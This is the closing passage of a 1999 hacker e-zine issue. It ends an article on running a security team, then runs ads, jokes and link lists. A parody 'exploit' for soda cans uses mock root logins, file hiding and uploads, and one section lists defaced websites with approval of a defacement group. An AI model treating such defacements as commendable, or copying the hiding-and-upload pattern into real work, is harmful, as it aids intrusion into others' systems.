information affect companies even quicker. The security group must be free to
ascertain an incident, call in the appropriate personnel, perform
"cyber-triage" and work with other systems staff and organizations to resolve
the situation without having to ask "May I?" of non-technical (read:
"clueless") management every step of the way.[3]

Your security group's freedom to operate more autonomously than other offices
in your company depends completely on how well you have cemented your
relationship with both senior management and your fellow division chiefs and
their staffs. Nothing is worse than receiving a pager call and assembling
your response team only to discover that the systems people responsible for
the system under attack have ignored your call for help or are not as
committed to near-real-time incident response as your security team is. The
commitment of other system administrators and other technical staff to
participating in a cohesive (proactive and reactive) security activity
depends greatly on how you interact with them during non-crises. Remember
what was mentioned above -- you are human, do NOT know it all, and above all,
need the help of people outside your group to effectively run a security
program. Being aloof and "untouchable" will only deny you the support you
need in running a security program.
Support others when they need it, and they will support you when you need it
(and your job is on the line!)

So, is it doable? It is if you have a team. Personally, I would rather take
technically qualified folks who are first and foremost team players and turn
them into a high-performance team of security professionals than lead a group
of security professionals who can't be a team.

[3] Such latitude is usually given the security group after upper management
has grown to respect the security team through its past performance in the
organization. The hard part is earning the level of respect that provides you
that level of operational autonomy.

Conclusions

Hopefully, at this point in the article, you have learned some "insider tips"
and lessons learned about how to develop and maintain a high-performance
information security organization. If not, you're out of luck until the next
issue. It's not that difficult, really. You have been forewarned about the
two key challenges to your security program: Selling it to Management and
Selling it to Users. Keeping your "doability" factor in mind will facilitate
both activities... and believe me, they are tough sales! Evaluating the
simplicity of your program will illuminate the potential bottlenecks and
barriers to successful security postures and awareness within your
organization. May you go forth and protect your information resources armed
with the knowledge of today and the foresight of tomorrow.

Thus endeth the sermon.

@HWA

 -=----------=- -=----------=- -=----------=- -=----------=-
 0 0 0 o O O O 0
 =----------=- -=----------=- -=----------=- -=----------=- -=----------=-
 =----------=- -=----------=- -=----------=- -=----------=- -=----------=-
 HWA.hax0r.news

AD.S ADVERTI$ING.        The HWA black market ADVERTISEMENT$.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 *****************************************************************************
 *                                                                           *
 *  ATTRITION.ORG            http://www.attrition.org                        *
 *  ATTRITION.ORG            Advisory Archive, Hacked Page Mirror            *
 *  ATTRITION.ORG            DoS Database, Crypto Archive                    *
 *  ATTRITION.ORG            Sarcasm, Rudeness, and More.                    *
 *                                                                           *
 *****************************************************************************

 When people ask you "Who is Kevin Mitnick?" do you have an answer?

 www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com
 www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com
 www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.com

      ########################################
      # Support 2600.com and the Free Kevin  #
      # defense fund site, visit it now! .   #
      #              FREE KEVIN!             #
      ########################################

 http://www.2600.com/
 http://www.kevinmitnick.com

 +-----------------------------------------------------------------------------+
 |  SmoG Alert ..          http://smog.cjb.net/             NEWS on SCIENCE    |
 |  ===================    http://smog.cjb.net/             NEWS on SECURITY   |
 |  NEWS/NEWS/NEWS/NEWS    http://smog.cjb.net/             NEWS on THE NET    |
 |                         http://smog.cjb.net/             NEWS on TECHNOLOGY |
 +-----------------------------------------------------------------------------+

 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 *  www.csoft.net webhosting, shell, unlimited hits bandwidth ...
                                                               www.csoft.net *
 *  www.csoft.net  www.csoft.net  www.csoft.net  www.csoft.net  www.csoft.net *
 *  http://www.csoft.net  One of our sponsors, visit them now   www.csoft.net *
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
 * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

 //////////////////////////////////////////////////////////////////////////////
 // To place an ad in this section simply type it up and email it to         //
 // hwa@press,usmc.net, put AD! in the subject header please.          - Ed //
 //////////////////////////////////////////////////////////////////////////////

 @HWA

HA.HA Humour and puzzles ...etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~

     Don't worry. worry a *lot*

     Send in submissions for this section please! ............c'mon, you KNOW
     you wanna...yeah you do...make it fresh and new...be famous...

     [ASCII art banner: "Send in your Ascii Art"]

     TOO, for inclusion in future issues. Do the HWA logo etc and we'll
     showcase it here to show off your talents...remember the 80's? dig out
     those ascii editors and do yer best...
     [ASCII art: HWA logo, and a cartoon captioned "HAX0R FOR HIRE ... WILL
     HACK FOR NETWORK ACCESS!"]

     (Ascii art from V0iD magazine #7)

     Contributed by VeRtIgO (who did the .avi included in this week's .zip
     file)

[19:43] Bill Gates is the Antichrist

   * Revelation 13:18 says:
   *
   * Here is wisdom. Let him who has understanding calculate the
   * number of the beast, for it is the number of a man: His
   * number is 666.

The real name of Bill Gates is William Henry Gates III. Nowadays he is known
as Bill Gates (III), where "III" means the order of third (3rd.) By converting
the letters of his current name to the ASCII values (which are used in
computers) you will get the following:

   B    I    L    L    G    A    T    E    S    3
  66 + 73 + 76 + 76 + 71 + 65 + 84 + 69 + 83 + 3 = 666

-----------------------------------------------------------------------------

Amusing Opcodes

BNE - Branch to Non-Existent code
BNR - Branch for No Reason.
BRA - Branch to Random Address
BVS - Branch to Virtual Subroutine
CLD - CalL a Doctor
CMD - Create Meaningless Data.
DEC - DElete the Code
DRA - Decrement Random Address.
EDR - Emit Deadly Radiation.
JMP - Jump if Memory Present (conditional jump)
LLI - Lose Last Instruction.
PRS - Push Results off Stack.
RIS - Remain In Subroutine.
RTI - Return from the Infinity
SHB - Scramble High order Bit.
TEC - Take Extra time for Calculation.
-----------------------------------------------------------------------------

Remote exploit for Pepsi and Coke cans
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://packetstorm.securify.com/

-----BEGIN PGP SIGNED HUMOR-----
Hash: SHA1

It seems cans of Pepsi and Diet Pepsi have a possible remote root problem on
them. While recently eyeing a can of coke while sitting on my terminal I
noticed that I could actually drink from it while standing at a distance of
at least 3 feet.

The sploit:

Now when I first did this I was amazed and had to have a couple friends test
it out before I submitted it so here it is...

ssh root@box.of.straws
password ********
login denied
ssh root@box.of.dixie.straws
password ********
Welcome to Dixie Straws
#[skr1ptkid@dixie.straw]su
[s/key 99 xp03r33t]
#[skr1ptkid@dixie.straw]skey 99 xp03r337
Enter secret password: DONT REWT THIS BOXN PLSE
#[skr1ptkid@dixie.straw]su
[s/key 99 xp03r33t]
Response:DONT REWT THIS BOXN PLSE
#
#
#cat straw straw straw straw >> super.straw
#mv superstraw ~/.superstraw
*note... had to rename as .superstraw to hide from a normal ls*
#
#cd ~
#ftp can.of.coke
#(username) anonymous
#(password) mike@hunt.com
*note uberleet alias*
#prompt
#mput ~/.superstraw
#quit

================================================

Now there is no known resolution to this problem as of yet, but I will be
working to ensure that no one else remotely close to my can of coke can root
it.

Temporary fix: I personally suggest something along these lines of security.

===================================================
# !/dev/mouth
# sil@antioffline.com
# securepep.sh

PATH=/dev/
echo SecurePep.v1
/bin/tar -cf saliva.tar ~/mouth/*
scp saliva.tar root@can.of.coke:/; tar -xvf saliva.tar
echo Now no one wants to drink any
===================================================

Now this obviously has been done for fun, so cheers to those who enjoy a
laugh and a big =P to those who don't...
You only live once ;)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Yours Truly
Sil of AntiOffline

sil@antioffline.com   http://www.antioffline.com
  mirrors: http://psyk0tik.mifits.org || http://xp0rnstar.self-evident.com
sil@macroshaft.org    http://www.macroshaft.org
  mirrors: http://total.misfits.org
sil@self-evident.com  http://www.self-evident.com

"Windows -- "When do you want to reboot today?""

ID 0x1281EC4F DH/DSS 4096/1024 CIPHER: CAST
PGP Fingerprint 46C0 6A83 E6D2 FEA6 383A B9A6 44D3 4E77 1281 EC4F

iQA/AwUBN6d/aETTTncSgexPEQLuAgCfRF5dpZii9yEPnqZ+F+
AEbzB+KL0An3mXPk+Y8lZxkr0crgw72zPX5w71=tCpK
-----END PGP SIGNATURE-----

@HWA

SITE.1
~~~~~~

http://www.cs.unm.edu/~dlchao/flake/doom/
http://www.geocities.com/doomhack/

These are a couple of weird sites; what they purport to be is a Doom <> Back
Orifice interface where PIDs on the host machine are represented in DOOM as
monsters: kill the monster and BO kills the PID on the host machine. Strange?
Sure is. Found this while sifting through the cDc q&a session responses...
someone was really bored when they came up with this idea!

You can send in submissions for this section too if you've found (or RUN) a
cool site...

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups
like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while, for those following their saga visit
http://frey.rapidnet.com/~ptah/ for 'the story so far'...
Hacker groups breakdown is available at Attrition.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

check out http://www.attrition.org/mirror/attrition/groups.html to see
who you are up against. You can often gather intel from IRC as many of
these groups maintain a presence by having a channel with their group
name as the channel name, others aren't so obvious but do exist.

US Army Reserve Command (www.usarc.army.mil)
Yukon Territories Government (www.gov.yk.ca)
Bexon (bexon.com)
Utad (PT) (ermelo.utad.pt)
Alper Brandon (www.alperbrandon.com)
Auto Body World (www.autobodyworld.com)
Catering Net (UK) (www.cateringnet.co.uk)
Cleveland Ohio (www.cleveland.oh.us)
GAA (IE) (www.gaa.ie)
Monkey Army (www.monkeyarmy.com)
The Renaissance (www.therenaissance.org)
USBBOG Edu (CO) (www.usbbog.edu.co)
Zeronet (AU) (www.zeronet.com.au)
Inca Tek (www.incatek.com)
Crayon Rouge (www.crayonrouge.com)
Blaklocks Flickan (NU) (www.blaklocksflickan.nu)

and more sites at the attrition cracked web sites mirror:

http://www.attrition.org/mirror/attrition/index.html

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links
section on the http://welcome.to/HWA.hax0r.news/ url so check there for
current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland.......: http://hackunlimited.com/
Germany.......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa..: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...

Got a link for this section? email it to hwa@press.usmc.net and I'll
review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]